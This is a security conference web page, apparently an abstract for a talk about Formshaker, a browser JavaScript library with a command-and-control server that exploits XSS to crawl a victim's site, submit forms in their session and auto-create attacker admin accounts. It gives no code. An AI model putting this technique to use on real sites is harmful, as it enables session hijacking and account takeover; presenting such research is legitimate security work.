Don’t _miss

Wire Festival

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nullam blandit hendrerit faucibus turpis dui.

Useful links

Call For Papers

Tickets & Merch

Sponsorship

Presentations

Workshop sessions

Speakers

Venue info

 

<We_can_help/>

What are you looking for?

<Good_things_happen/> Welcome to Conference

d

Copyright @ Select-themes

Follow us

>Formshaker

Formshaker

Formshaker is a JS lib that runs in browsers and acts as a proxy, establishing a bridge between websites functionality and attackers. Its purpose is to maximize the attacker capabilities when exploiting XSS. Formshaker is a project that a friend of mine and I initiated in 2018. It consists of a web application (C&C) and a JS library. The JS library operates in two modes: C&C dependent and standalone. From a technical standpoint, the tool’s purpose is to crawl a website, collect its HTML forms, and provide an attacker with visibility into the forms available on the website where the JS library is active. This allows the attacker, through the C&C, to view, modify, and submit the forms via the JS library within the context of the victim’s session. On the other hand, the standalone version of the tool is self-contained. It includes all the necessary information within the JS code to populate form inputs and make decisions to automatically submit forms with preconfigured data. It’s important to note that this mode operates independently and does not interact with the C&C. An intriguing scenario occurs when you, as an attacker, inject the JS agent into the victim’s browser, particularly if that person possesses admin privileges. In such a case, the JS library would identify the user creation form, fill its inputs with predetermined values (such as the attacker’s email and password), and proceed to create a user.

About the Speaker

Ricardo Martin Rodriguez is a passionate and analytical security professional with 8+ years of experience in penetration testing, vulnerability assessments, and security recommendations, possessing a deep understanding of Shift Left, DevSecOps, Security Champions, and SDL concepts.